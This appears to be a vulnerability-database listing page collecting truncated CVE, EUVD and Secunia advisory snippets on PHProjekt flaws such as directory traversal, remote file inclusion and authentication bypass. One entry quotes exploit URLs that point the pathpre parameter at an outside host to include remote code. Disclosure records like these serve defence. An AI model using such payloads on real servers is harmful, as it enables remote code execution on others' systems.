EUVD-2007-1633

Malware in sbrugna...

EUVD-2001-0977

Malware in sbrugna...

CVE-2002-1761

Directory traversal vulnerability in PHProjekt 2.0 through 3.1 allows remote attackers to read arbitrary files via .. dot dot sequences...

PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2)

Content management module for PHProjekt v0.6.1 Remote File Inclusion Vulnerability 2 Found By: D3nGeR E-Mail: [email protected] exploit: http://Target/Path/cmlib.inc.php?pathpre=http://cmd.gif? http://Target/Path/doc/br.edithelp.php?pathpre=http://cmd.gif?...

CVE-2002-1761

CVE-2002-1761 affects PHProjekt versions 2.0 through 3.1 and is a directory traversal vulnerability that allows remote attackers to read arbitrary files via .. sequences. The connected sources confirm the affected software and vulnerability class but do not provide exploitation details or explici...

CVE-2004-2739

The setup routine setup.php in PHProjekt 4.2.1 and earlier allows remote attackers to modify system configuration via unknown attack vectors...

PHProjekt: Remote code execution vulnerability

Background PHProjekt is a modular groupware web application used to coordinate group activities and share files. Description cYon discovered that the authform.inc.php script allows a remote user to define the global variable $pathpre. Impact A remote attacker can exploit this vulnerability to for...

[SA13660] PHProjekt "path_pre" Parameter Arbitrary File Inclusion Vulnerability

TITLE: PHProjekt "pathpre" Parameter Arbitrary File Inclusion Vulnerability SECUNIA ADVISORY ID: SA13660 VERIFY ADVISORY: http://secunia.com/advisories/13660/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: PHProjekt 4.x http://secunia.com/product/4346/ DESCRIPTION:...

[SA13355] PHProjekt Unspecified "setup.php" Security Bypass Vulnerability

TITLE: PHProjekt Unspecified "setup.php" Security Bypass Vulnerability SECUNIA ADVISORY ID: SA13355 VERIFY ADVISORY: http://secunia.com/advisories/13355/ CRITICAL: Moderately critical IMPACT: Security Bypass WHERE: From remote SOFTWARE: PHProjekt 4.x http://secunia.com/product/4346/ DESCRIPTION:...

CVE-2002-0451

filemanagerforms.php in PHProjekt 3.1 and 3.1a allows remote attackers to execute arbitrary PHP code by specifying the URL to the code in the libpath parameter...

CVE-2002-1758

PHProjekt 2.0 through 3.1 allows remote attackers to view or modify data via requests to certain scripts that do not verify if the user is logged in...

CVE-2002-1761

Directory traversal vulnerability in PHProjekt 2.0 through 3.1 allows remote attackers to read arbitrary files via .. dot dot sequences...

CVE-2002-0451

filemanagerforms.php in PHProjekt 3.1 and 3.1a allows remote attackers to execute arbitrary PHP code by specifying the URL to the code in the libpath parameter...

CVE-2001-0648

Directory traversal vulnerability in PHProjekt 2.1 and earlier allows a remote attacker to conduct unauthorized activities via a dot dot .. attack on the file module...